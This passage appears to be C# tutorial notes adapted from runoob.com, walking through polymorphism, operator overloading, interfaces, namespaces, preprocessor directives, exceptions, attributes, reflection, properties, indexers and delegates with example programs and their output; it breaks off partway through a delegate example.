The following program computes the areas of different shapes through the virtual method area(): the same call site ends up executing different code depending on the object's actual type:

using System;
namespace PolymorphismApplication
{
    class Shape
    {
        protected int width, height;
        public Shape(int a = 0, int b = 0)
        {
            width = a;
            height = b;
        }
        public virtual int area()
        {
            Console.WriteLine("Area of the parent class:");
            return 0;
        }
    }
    class Rectangle : Shape
    {
        public Rectangle(int a = 0, int b = 0) : base(a, b)
        {
        }
        public override int area()
        {
            Console.WriteLine("Area of the Rectangle class:");
            return (width * height);
        }
    }
    class Triangle : Shape
    {
        public Triangle(int a = 0, int b = 0) : base(a, b)
        {
        }
        public override int area()
        {
            Console.WriteLine("Area of the Triangle class:");
            return (width * height / 2);
        }
    }
    class Caller
    {
        public void CallArea(Shape sh)
        {
            int a;
            a = sh.area();
            Console.WriteLine("Area: {0}", a);
        }
    }
    class Tester
    {
        static void Main(string[] args)
        {
            Caller c = new Caller();
            Rectangle r = new Rectangle(10, 7);
            Triangle t = new Triangle(10, 5);
            c.CallArea(r);
            c.CallArea(t);
            Console.ReadKey();
        }
    }
}
Area of the Rectangle class:
Area: 70
Area of the Triangle class:
Area: 25

C# Operator Overloading

You can redefine or overload the operators built into C#, which lets operators work with user-defined types as well. An overloaded operator is a function with a special name, defined with the keyword operator followed by the operator's symbol; like any other function, it has a return type and a parameter list.

Implementing Operator Overloading

using System;

namespace OperatorOvlApplication
{
    class Box
    {
        private double length;  // length
        private double breadth; // breadth
        private double height;  // height

        public double getVolume()
        {
            return length * breadth * height;
        }
        public void setLength(double len)
        {
            length = len;
        }

        public void setBreadth(double bre)
        {
            breadth = bre;
        }

        public void setHeight(double hei)
        {
            height = hei;
        }
        // Overload the + operator to add two Box objects
        public static Box operator+ (Box b, Box c)
        {
            Box box = new Box();
            box.length = b.length + c.length;
            box.breadth = b.breadth + c.breadth;
            box.height = b.height + c.height;
            return box;
        }
    }

    class Tester
    {
        static void Main(string[] args)
        {
            Box Box1 = new Box(); // declare Box1 of type Box
            Box Box2 = new Box(); // declare Box2 of type Box
            Box Box3 = new Box(); // declare Box3 of type Box
            double volume = 0.0;  // volume

            // Box1 specification
            Box1.setLength(6.0);
            Box1.setBreadth(7.0);
            Box1.setHeight(5.0);

            // Box2 specification
            Box2.setLength(12.0);
            Box2.setBreadth(13.0);
            Box2.setHeight(10.0);

            // volume of Box1
            volume = Box1.getVolume();
            Console.WriteLine("Volume of Box1: {0}", volume);

            // volume of Box2
            volume = Box2.getVolume();
            Console.WriteLine("Volume of Box2: {0}", volume);

            // add the two objects
            Box3 = Box1 + Box2;

            // volume of Box3
            volume = Box3.getVolume();
            Console.WriteLine("Volume of Box3: {0}", volume);
            Console.ReadKey();
        }
    }
}
                                          -
                                          Box1 的体积: 210
                                          Box2 的体积: 1560
                                          Box3 的体积: 5400

Overloadable and non-overloadable operators

Most of the built-in operators can be overloaded: the unary operators +, -, !, ~, ++, --, true, false and the binary operators +, -, *, /, %, &, |, ^, <<, >>. The comparison operators ==, !=, <, >, <=, >= can also be overloaded, but only in pairs (== with !=, < with >, <= with >=). The operators &&, ||, [], () and the compound assignment operators such as += cannot be overloaded directly, and =, ., ?:, new, is, sizeof, typeof cannot be overloaded at all.
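
As a quick illustration of the pairing rule, here is a minimal sketch of overloading == together with != on a small value-holder type (the Point2 class and its members are illustrative, not part of the tutorial's examples):

using System;

class Point2
{
    private int x, y;
    public Point2(int x, int y) { this.x = x; this.y = y; }

    // == and != must be overloaded as a pair (this sketch assumes non-null operands)
    public static bool operator ==(Point2 a, Point2 b)
    {
        return a.x == b.x && a.y == b.y;
    }
    public static bool operator !=(Point2 a, Point2 b)
    {
        return !(a == b);
    }

    // Keep Equals/GetHashCode consistent with ==
    public override bool Equals(object obj)
    {
        return obj is Point2 p && this == p;
    }
    public override int GetHashCode()
    {
        return x * 31 + y;
    }

    static void Main()
    {
        Console.WriteLine(new Point2(1, 2) == new Point2(1, 2)); // True
        Console.WriteLine(new Point2(1, 2) != new Point2(3, 4)); // True
    }
}

Overriding Equals and GetHashCode alongside == keeps the different equality checks consistent; the compiler warns (CS0660/CS0661) if they are missing.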

C# Interfaces (Interface)

An interface defines a contract: the members it declares must be implemented by any class or struct that inherits the interface. The example below defines an interface with a single member and a class that implements it:

using System;

interface IMyInterface
{
    // Interface member
    void MethodToImplement();
}

class InterfaceImplementer : IMyInterface
{
    static void Main()
    {
        InterfaceImplementer iImp = new InterfaceImplementer();
        iImp.MethodToImplement();
    }

    public void MethodToImplement()
    {
        Console.WriteLine("MethodToImplement() called.");
    }
}

MethodToImplement() called.

The following example defines two interfaces, IMyInterface and IParentInterface.

(An interface can inherit from other interfaces.) If an interface inherits from other interfaces, the implementing class or struct must implement the members of all of those interfaces.

In the example below, IMyInterface inherits from IParentInterface, so the implementing class must implement both the MethodToImplement() and ParentInterfaceMethod() methods:

using System;

interface IParentInterface
{
    void ParentInterfaceMethod();
}

interface IMyInterface : IParentInterface
{
    void MethodToImplement();
}

class InterfaceImplementer : IMyInterface
{
    static void Main()
    {
        InterfaceImplementer iImp = new InterfaceImplementer();
        iImp.MethodToImplement();
        iImp.ParentInterfaceMethod();
    }

    public void MethodToImplement()
    {
        Console.WriteLine("MethodToImplement() called.");
    }

    public void ParentInterfaceMethod()
    {
        Console.WriteLine("ParentInterfaceMethod() called.");
    }
}

MethodToImplement() called.
ParentInterfaceMethod() called.

C# Namespaces (Namespace)

                                          • C# 命名空间(Namespace)| 菜鸟教程 (runoob.com)

A namespace is designed to provide a way to keep one set of names separate from another: a class name declared in one namespace does not conflict with the same class name declared in a different namespace.

As an analogy from computer file systems: a folder (directory) can contain other folders, and while no two files in the same folder can share a name, files in different folders can have the same name.

Defining a namespace
using System;

namespace first_space
{
    class namespace_cl
    {
        public void func()
        {
            Console.WriteLine("Inside first_space");
        }
    }
}

namespace second_space
{
    class namespace_cl
    {
        public void func()
        {
            Console.WriteLine("Inside second_space");
        }
    }
}

class TestClass
{
    static void Main(string[] args)
    {
        first_space.namespace_cl fc = new first_space.namespace_cl();
        second_space.namespace_cl sc = new second_space.namespace_cl();
        fc.func();
        sc.func();
        Console.ReadKey();
    }
}

Inside first_space
Inside second_space
The using keyword

The using keyword states that the program is using the names in the given namespace. For example, our programs use the System namespace, which defines the class Console, so we can write simply:

Console.WriteLine("Hello there");

We could also write the fully qualified name, as follows:

System.Console.WriteLine("Hello there");

You can also use the using namespace directive, so that you don't have to prefix names with the namespace each time they are used (similar to using namespace std; in C++):

using System;
using first_space;
using second_space;

namespace first_space
{
    class abc
    {
        public void func()
        {
            Console.WriteLine("Inside first_space");
        }
    }
}

namespace second_space
{
    class efg
    {
        public void func()
        {
            Console.WriteLine("Inside second_space");
        }
    }
}

class TestClass
{
    static void Main(string[] args)
    {
        abc fc = new abc();
        efg sc = new efg();
        fc.func();
        sc.func();
        Console.ReadKey();
    }
}

Inside first_space
Inside second_space
Nested namespaces

Namespaces can be nested, i.e. you can define one namespace inside another, as shown below:

using System;
using SomeNameSpace;
using SomeNameSpace.Nested;

namespace SomeNameSpace
{
    public class MyClass
    {
        static void Main()
        {
            Console.WriteLine("In SomeNameSpace");
            Nested.NestedNameSpaceClass.SayHello(); // prints "In Nested"
        }
    }

    // Nested namespace
    namespace Nested
    {
        public class NestedNameSpaceClass
        {
            public static void SayHello()
            {
                Console.WriteLine("In Nested");
            }
        }
    }
}

C# Preprocessor Directives

                                            • C# 预处理器指令 | 菜鸟教程 (runoob.com)

The #define and #undef preprocessors

#define defines a symbol (typically used for conditional compilation); #undef removes the definition of a symbol.

#define DEBUG

#undef RELEASE

#define lets you define a symbol; when that symbol is used as the expression passed to an #if directive, the expression evaluates to true. Its syntax is as follows:

#define PI
using System;

namespace PreprocessorDAppl
{
    class Program
    {
        static void Main(string[] args)
        {
#if (PI)
            Console.WriteLine("PI is defined");
#else
            Console.WriteLine("PI is not defined");
#endif
            Console.ReadKey();
        }
    }
}

PI is defined

Conditional directives: #if, #elif, #else, and #endif

You can use the #if directive to create a conditional directive.

A conditional directive tests whether a symbol is true; if it is, the compiler includes the code between the #if and the next directive.

Syntax of a conditional directive:

#define DEBUG
#define VC_V10
using System;

public class TestClass
{
    public static void Main()
    {
#if (DEBUG && !VC_V10)
        Console.WriteLine("DEBUG is defined");
#elif (!DEBUG && VC_V10)
        Console.WriteLine("VC_V10 is defined");
#elif (DEBUG && VC_V10)
        Console.WriteLine("DEBUG and VC_V10 are defined");
#else
        Console.WriteLine("DEBUG and VC_V10 are not defined");
#endif
        Console.ReadKey();
    }
}

DEBUG and VC_V10 are defined

                                              #pragma

Sends special instructions to the compiler. The most common use is to disable specific warnings:

#pragma warning disable 414   // CS0414: private field is assigned but never used
private int unusedVariable;
#pragma warning restore 414
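
The snippet above is only a fragment; a minimal compilable sketch of the same idea (the PragmaDemo class and its field are illustrative):

using System;

class PragmaDemo
{
#pragma warning disable 414 // suppress CS0414 for the field below
    private int unusedVariable = 0; // assigned but never read; would otherwise trigger CS0414
#pragma warning restore 414 // re-enable the warning from here on

    static void Main()
    {
        Console.WriteLine("Compiled without the CS0414 warning.");
    }
}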

Notes on using preprocessor directives

• Improve code readability: #region helps separate blocks of code and keeps the code better organized (see the sketch after this list).
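
A small illustration of #region and #endregion (the RegionDemo class is illustrative):

using System;

class RegionDemo
{
    // The region below can be collapsed as one block in most IDEs
    #region Helper methods
    static int Square(int x) { return x * x; }
    #endregion

    static void Main()
    {
        Console.WriteLine(Square(6)); // 36
    }
}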

C# Regular Expressions

• C# 正则表达式 | 菜鸟教程 (runoob.com)

Honestly, I think you can just ask ChatGPT to write regular expressions for you. The example below uses a lookbehind, (?<=19)\d{2}\b, to match the last two digits of the numbers that start with 19:

using System;
using System.Text.RegularExpressions;

public class Example
{
    public static void Main()
    {
        string input = "1851 1999 1950 1905 2003";
        string pattern = @"(?<=19)\d{2}\b";

        foreach (Match match in Regex.Matches(input, pattern))
            Console.WriteLine(match.Value);
    }
}

99
50
05

C# Exception Handling

                                              • C# 异常处理 | 菜鸟教程 (runoob.com)

Exception handling

C# provides a structured exception-handling scheme in the form of try and catch blocks, which separate the core program statements from the error-handling statements.

These error-handling blocks are implemented with the try, catch (runs if an exception occurs), and finally (runs whether or not an exception occurs) keywords. Below is an example that throws an exception when dividing by zero:

using System;

namespace ErrorHandlingApplication
{
    class DivNumbers
    {
        int result;

        DivNumbers()
        {
            result = 0;
        }

        public void division(int num1, int num2)
        {
            try
            {
                result = num1 / num2;
            }
            catch (DivideByZeroException e)
            {
                Console.WriteLine("Exception caught: {0}", e);
            }
            finally
            {
                Console.WriteLine("Result: {0}", result);
            }
        }

        static void Main(string[] args)
        {
            DivNumbers d = new DivNumbers();
            d.division(25, 0);
            d.division(25, 5);
            Console.ReadKey();
        }
    }
}

Exception caught: System.DivideByZeroException: Attempted to divide by zero.
   at ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) in XXX.cs:line 15
Result: 0
Result: 5
Creating user-defined exceptions

You can also define your own exceptions. A user-defined exception class derives from the ApplicationException class; use throw to raise the exception. The following example demonstrates this:

                                                -
using System;

namespace UserDefinedException
{
    class TestTemperature
    {
        static void Main(string[] args)
        {
            Temperature temp = new Temperature();
            try
            {
                temp.showTemp();
            }
            catch (TempIsZeroException e)
            {
                Console.WriteLine("TempIsZeroException: {0}", e.Message);
            }
            Console.ReadKey();
        }
    }
}

public class TempIsZeroException : ApplicationException
{
    public TempIsZeroException(string message) : base(message)
    {
    }
}

public class Temperature
{
    int temperature = 0;

    public void showTemp()
    {
        if (temperature == 0)
        {
            throw (new TempIsZeroException("Zero Temperature found"));
        }
        else
        {
            Console.WriteLine("Temperature: {0}", temperature);
        }
    }
}
                                                TempIsZeroException: Zero Temperature found
Throwing Objects

You can throw an object if it derives, directly or indirectly, from the System.Exception class. You can use a throw statement in a catch block to rethrow the caught object, as follows:

catch (Exception e)
{
    // ...
    throw e;
}
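
Note the difference between the two forms of rethrowing: throw e; rethrows the object but resets its stack trace to the current location, while a bare throw; statement inside the catch block rethrows the original exception with its stack trace preserved, and is generally preferred.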

C# File Input and Output

A file is a collection of data stored on disk with a specific name and directory path. When a file is opened for reading or writing, it becomes a stream.

Fundamentally, a stream is a sequence of bytes passing through a communication path. There are two main streams: the input stream and the output stream. The input stream is used to read data from a file (a read operation), and the output stream is used to write data to a file (a write operation).
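
As a minimal sketch of both directions (the file name test.txt is an illustrative assumption, not from the original text), StreamWriter wraps an output stream to the file and StreamReader wraps an input stream from it:

using System;
using System.IO;

namespace FileIODemo
{
    class Program
    {
        static void Main(string[] args)
        {
            // Output stream: write two lines to the file.
            using (StreamWriter writer = new StreamWriter("test.txt"))
            {
                writer.WriteLine("Hello");
                writer.WriteLine("World");
            }

            // Input stream: read the file back line by line.
            using (StreamReader reader = new StreamReader("test.txt"))
            {
                string line;
                while ((line = reader.ReadLine()) != null)
                {
                    Console.WriteLine(line);
                }
            }
            Console.ReadKey();
        }
    }
}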


Creating Custom Attributes

A new custom attribute should derive from the System.Attribute class.

// A custom attribute DeBugInfo is applied to the class and its members
using System;

[AttributeUsage(AttributeTargets.Class |
                AttributeTargets.Constructor |
                AttributeTargets.Field |
                AttributeTargets.Method |
                AttributeTargets.Property,
                AllowMultiple = true)]
public class DeBugInfo : System.Attribute
{
    private int bugNo;
    private string developer;
    private string lastReview;
    public string message;

    public DeBugInfo(int bg, string dev, string d)
    {
        this.bugNo = bg;
        this.developer = dev;
        this.lastReview = d;
    }

    public int BugNo
    {
        get
        {
            return bugNo;
        }
    }
    public string Developer
    {
        get
        {
            return developer;
        }
    }
    public string LastReview
    {
        get
        {
            return lastReview;
        }
    }
    public string Message
    {
        get
        {
            return message;
        }
        set
        {
            message = value;
        }
    }
}

[DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
[DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
class Rectangle
{
    // Member variables
    protected double length;
    protected double width;

    public Rectangle(double l, double w)
    {
        length = l;
        width = w;
    }

    [DeBugInfo(55, "Zara Ali", "19/10/2012",
               Message = "Return type mismatch")]
    public double GetArea()
    {
        return length * width;
    }

    [DeBugInfo(56, "Zara Ali", "19/10/2012")]
    public void Display()
    {
        Console.WriteLine("Length: {0}", length);
        Console.WriteLine("Width: {0}", width);
        Console.WriteLine("Area: {0}", GetArea());
    }
}

class Program
{
    static void Main(string[] args)
    {
        Rectangle r = new Rectangle(5, 8);
        r.Display();
    }
}
                                                Length: 5
                                                Width: 8
                                                Area: 40

C# Reflection

Reflection is the ability of a program to access, inspect, and modify its own state or behavior.

An assembly contains modules, a module contains types, and a type contains members. Reflection provides objects that encapsulate assemblies, modules, and types.
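
As a minimal sketch of the idea, the DeBugInfo attributes attached to the Rectangle class in the previous section could be read back at runtime like this (the AttributeReader class name is an illustrative assumption, and this Main would replace the earlier one):

using System;
using System.Reflection;

class AttributeReader
{
    static void Main(string[] args)
    {
        Type type = typeof(Rectangle);

        // Attributes attached to the class itself.
        foreach (object attr in type.GetCustomAttributes(false))
        {
            DeBugInfo dbi = attr as DeBugInfo;
            if (dbi != null)
            {
                Console.WriteLine("Bug no: {0}, developer: {1}, message: {2}",
                                  dbi.BugNo, dbi.Developer, dbi.Message);
            }
        }

        // Attributes attached to each method.
        foreach (MethodInfo m in type.GetMethods())
        {
            foreach (object attr in m.GetCustomAttributes(false))
            {
                DeBugInfo dbi = attr as DeBugInfo;
                if (dbi != null)
                {
                    Console.WriteLine("{0}: bug no {1}, developer: {2}",
                                      m.Name, dbi.BugNo, dbi.Developer);
                }
            }
        }
        Console.ReadKey();
    }
}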

The following example uses the MemberInfo class to discover the custom attributes attached to a class:

using System;

[AttributeUsage(AttributeTargets.All)]
public class HelpAttribute : System.Attribute
{
    public readonly string Url;

    public string Topic // Topic is a named parameter
    {
        get
        {
            return topic;
        }
        set
        {
            topic = value;
        }
    }

    public HelpAttribute(string url) // url is a positional parameter
    {
        this.Url = url;
    }

    public override string ToString()
    {
        return base.ToString() + ": " + this.Url;
    }

    private string topic;
}

[HelpAttribute("Information on the class MyClass")]
class MyClass
{
}

namespace AttributeAppl
{
    class Program
    {
        static void Main(string[] args)
        {
            System.Reflection.MemberInfo info = typeof(MyClass);
            object[] attributes = info.GetCustomAttributes(true);
            for (int i = 0; i < attributes.Length; i++)
            {
                System.Console.WriteLine(attributes[i]);
            }
            Console.ReadKey();
        }
    }
}
                                                HelpAttribute: Information on the class MyClass

C# Properties

A property is a named member of a class, structure, or interface. Member variables or methods in a class or structure are called fields. A property is an extension of a field and is accessed using the same syntax. Properties use accessors through which the values of private fields can be read, written, or manipulated.

A property does not designate a storage location. Instead, it has accessors that read, write, or compute its value.

For example, consider a class named Student with private fields for age, name, and code. We cannot directly access these fields from outside the class scope, but we can have properties for accessing them.
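
Since a property need not map one-to-one onto a stored field, an accessor can also compute its value on the fly. A minimal sketch of this (the PersonName class and FullName property are illustrative assumptions, not part of the original example):

using System;

class PersonName
{
    private string first = "Zara";
    private string last = "Ali";

    // FullName stores nothing itself; its get accessor computes the
    // value from the two private fields each time it is read.
    public string FullName
    {
        get
        {
            return first + " " + last;
        }
    }

    static void Main()
    {
        Console.WriteLine(new PersonName().FullName); // prints: Zara Ali
    }
}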

Accessors

The accessor of a property contains the executable statements that get (read or compute) or set (write) the property. An accessor declaration can contain a get accessor, a set accessor, or both. For example:

using System;

namespace runoob
{
    class Student
    {
        private string code = "N.A";
        private string name = "not known";
        private int age = 0;

        // Declare a Code property of type string
        public string Code
        {
            get
            {
                return code;
            }
            set
            {
                code = value;
            }
        }

        // Declare a Name property of type string
        public string Name
        {
            get
            {
                return name;
            }
            set
            {
                name = value;
            }
        }

        // Declare an Age property of type int
        public int Age
        {
            get
            {
                return age;
            }
            set
            {
                age = value;
            }
        }

        public override string ToString()
        {
            return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
        }
    }

    class ExampleDemo
    {
        public static void Main()
        {
            // Create a new Student object
            Student s = new Student();

            // Set the student's code, name and age
            s.Code = "001";
            s.Name = "Zara";
            s.Age = 9;
            Console.WriteLine("Student Info: {0}", s);
            // Increase the age
            s.Age += 1;
            Console.WriteLine("Student Info: {0}", s);
            Console.ReadKey();
        }
    }
}
                                                Student Info: Code = 001, Name = Zara, Age = 9
                                                Student Info: Code = 001, Name = Zara, Age = 10

In this code, keeping code, name, and age as private fields and exposing them through the public properties Code, Name, and Age has several advantages over making them public fields directly:

- Encapsulation: the class retains control over how its data is read and modified.
- Validation: a set accessor can check or reject a value before it is stored (see the sketch below).
- Flexibility: the internal representation can change later without breaking code that uses the properties.
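
A minimal sketch of the validation point, extending the Age setter from the example above (the negative-age check is an illustrative assumption, not part of the original program):

using System;

class Student
{
    private int age = 0;

    // The set accessor validates its input before assigning,
    // which a public field could never enforce.
    public int Age
    {
        get
        {
            return age;
        }
        set
        {
            if (value < 0)
            {
                throw new ArgumentOutOfRangeException("value", "Age cannot be negative");
            }
            age = value;
        }
    }
}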


Abstract Properties

An abstract class may have abstract properties, which must be implemented in the derived class. The following program illustrates this:

using System;

namespace runoob
{
    public abstract class Person
    {
        public abstract string Name
        {
            get;
            set;
        }
        public abstract int Age
        {
            get;
            set;
        }
    }

    class Student : Person
    {
        private string code = "N.A";
        private string name = "N.A";
        private int age = 0;

        // Declare a Code property of type string
        public string Code
        {
            get
            {
                return code;
            }
            set
            {
                code = value;
            }
        }

        // Override the abstract Name property
        public override string Name
        {
            get
            {
                return name;
            }
            set
            {
                name = value;
            }
        }

        // Override the abstract Age property
        public override int Age
        {
            get
            {
                return age;
            }
            set
            {
                age = value;
            }
        }

        public override string ToString()
        {
            return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
        }
    }

    class ExampleDemo
    {
        public static void Main()
        {
            // Create a new Student object
            Student s = new Student();

            // Set the student's code, name and age
            s.Code = "001";
            s.Name = "Zara";
            s.Age = 9;
            Console.WriteLine("Student Info:- {0}", s);
            // Increase the age
            s.Age += 1;
            Console.WriteLine("Student Info:- {0}", s);
            Console.ReadKey();
        }
    }
}
                                                  Student Info:- Code = 001, Name = Zara, Age = 9
                                                  Student Info:- Code = 001, Name = Zara, Age = 10
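A side note, not part of the original tutorial: because every accessor above only reads or writes a backing field, the same classes can be written more compactly with auto-implemented properties, where the compiler generates the backing fields. A minimal sketch:

using System;

namespace runoob
{
    public abstract class Person
    {
        // Abstract properties: derived classes must supply the accessors
        public abstract string Name { get; set; }
        public abstract int Age { get; set; }
    }

    class Student : Person
    {
        // Auto-implemented properties: the compiler generates the backing fields
        public string Code { get; set; }
        public override string Name { get; set; }
        public override int Age { get; set; }

        public Student()
        {
            // Same defaults as the hand-written version above
            Code = "N.A";
            Name = "N.A";
            Age = 0;
        }

        public override string ToString()
        {
            return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
        }
    }
}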

C# Indexer

An indexer allows an object to be indexed with a subscript, the way an array is.

When you define an indexer for a class, the class behaves like a virtual array: its members can be accessed with the array access operator [ ].

Uses of an Indexer

Declaring an indexer is in some ways similar to declaring a property. As with a property, you define an indexer with get and set accessors. However, a property returns or sets a specific data member, whereas an indexer returns or sets a particular value on the object instance. In other words, it divides the instance data into smaller parts and indexes each part for reading and writing.

Defining a property involves giving it a name. An indexer is defined without a name; instead it carries the this keyword, which refers to the object instance. The following example demonstrates the concept:

                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
public static int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  namelist[i] = "N. A.";
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
Output:
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.
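A hedged aside: on C# 7.0 or later, the bounds-checked get accessor can be written as an expression-bodied member. The class name IndexedNamesCompact below is illustrative, not from the tutorial:

using System;

class IndexedNamesCompact
{
    public static int size = 10;
    private string[] namelist = new string[size];

    public IndexedNamesCompact()
    {
        for (int i = 0; i < size; i++)
            namelist[i] = "N. A.";
    }

    // Same get/set logic as above; the getter is an expression-bodied accessor (C# 7.0+)
    public string this[int index]
    {
        get => (index >= 0 && index < size) ? namelist[index] : "";
        set
        {
            if (index >= 0 && index < size)
                namelist[index] = value;
        }
    }
}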

Overloading an Indexer

Indexers can be overloaded. An indexer can also be declared with multiple parameters, and each parameter may be of a different type. The index does not have to be an integer: C# allows indexers of other types, such as string.

The following example demonstrates an overloaded indexer:

                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
public static int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  {
                                                  namelist[i] = "N. A.";
                                                  }
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }
                                                  public int this[string name]
                                                  {
                                                  get
                                                  {
                                                  int index = 0;
                                                  while (index < size)
                                                  {
                                                  if (namelist[index] == name)
                                                  {
                                                  return index;
                                                  }
                                                  index++;
                                                  }
                                                  return index;
                                                  }

                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
// Use the first indexer, which takes an int parameter
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
// Use the second indexer, which takes a string parameter
                                                  Console.WriteLine(names["Nuha"]);
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
Output:
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.
                                                  2
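One caveat worth noting: when the name is not found, the string indexer above returns size (here 10), which a caller cannot tell apart from a valid index. A common alternative is to return -1, for example via Array.IndexOf; the class IndexedNamesSafe below is an illustrative sketch, not part of the tutorial:

using System;

class IndexedNamesSafe
{
    private string[] namelist = { "Zara", "Riz", "Nuha" };

    // Returns the first index of name, or -1 when it is absent
    public int this[string name]
    {
        get { return Array.IndexOf(namelist, name); }
    }
}

With this variant, new IndexedNamesSafe()["Nuha"] still yields 2, while a missing name yields -1 instead of an ambiguous 10.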

C# Delegate

                                                  • C# 委托(Delegate) | 菜鸟教程 (runoob.com)

Instantiating a Delegate

                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
// Create delegate instances
NumberChanger nc1 = new NumberChanger(AddNum);
NumberChanger nc2 = new NumberChanger(MultNum);
// Call the methods through the delegate objects
nc1(25); // num = 10 + 25 = 35
Console.WriteLine("Value of Num: {0}", getNum());
nc2(5); // num = 35 * 5 = 175
Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
Output:
                                                    Value of Num: 35
                                                    Value of Num: 175
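As an aside (standard C# since version 2.0, though not shown in the tutorial): writing new NumberChanger(...) is optional, because a method group converts implicitly to a compatible delegate type. A minimal runnable sketch:

using System;

delegate int NumberChanger(int n);

class MethodGroupDemo
{
    static int num = 10;
    static int AddNum(int p) { num += p; return num; }

    static void Main()
    {
        // Method-group conversion: no explicit new NumberChanger(...) needed
        NumberChanger nc1 = AddNum;
        Console.WriteLine(nc1(25)); // prints 35
    }
}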

Multicasting of a Delegate

Delegate objects can be composed using the + operator. A composed delegate calls the two delegates it was composed from; only delegates of the same type can be composed. The - operator can be used to remove a component delegate from a composed delegate.

Using this feature of delegates, you can create an invocation list of methods that will be called when the delegate is invoked. This is called multicasting a delegate. The following program demonstrates it:

                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
// Create delegate instances
                                                    NumberChanger nc;
                                                    NumberChanger nc1 = new NumberChanger(AddNum);
                                                    NumberChanger nc2 = new NumberChanger(MultNum);
                                                    nc = nc1;
                                                    nc += nc2;
// Invoke the multicast delegate: AddNum runs, then MultNum
nc(5); // (10 + 5) * 5 = 75
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
Output:
                                                    Value of Num: 75
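The program above only exercises the + operator. Below is a minimal sketch of the - operator mentioned earlier, removing a component delegate from the composed delegate (the class name RemoveDemo is illustrative):

using System;

delegate int NumberChanger(int n);

class RemoveDemo
{
    static int num = 10;
    static int AddNum(int p) { num += p; return num; }
    static int MultNum(int q) { num *= q; return num; }

    static void Main()
    {
        NumberChanger nc = new NumberChanger(AddNum);
        nc += new NumberChanger(MultNum); // invocation list: AddNum, MultNum
        nc -= new NumberChanger(MultNum); // "-" removes MultNum again
        nc(5);                            // only AddNum runs: num = 10 + 5 = 15
        Console.WriteLine("Value of Num: {0}", num); // prints 15
    }
}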

Uses of a Delegate

The following example demonstrates how a delegate is used. The delegate printString can reference any method that takes a string as input and returns nothing.

We use this delegate to call two methods (turning a function into a parameter): the first prints the string to the console, the second prints it to a file:

                                                    using System;
                                                    using System.IO;

                                                    namespace DelegateAppl
                                                    {
                                                    class PrintString
                                                    {
                                                    static FileStream fs;
                                                    static StreamWriter sw;
// Delegate declaration
                                                    public delegate void printString(string s);

// This method prints to the console
                                                    public static void WriteToScreen(string str)
                                                    {
                                                    Console.WriteLine("The String is: {0}", str);
                                                    }
// This method prints to a file
                                                    public static void WriteToFile(string s)
                                                    {
                                                    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
                                                    sw = new StreamWriter(fs);
                                                    sw.WriteLine(s);
                                                    sw.Flush();
                                                    sw.Close();
                                                    fs.Close();
                                                    }
// This method takes a delegate as a parameter and uses it to call the method
                                                    public static void sendString(printString ps)
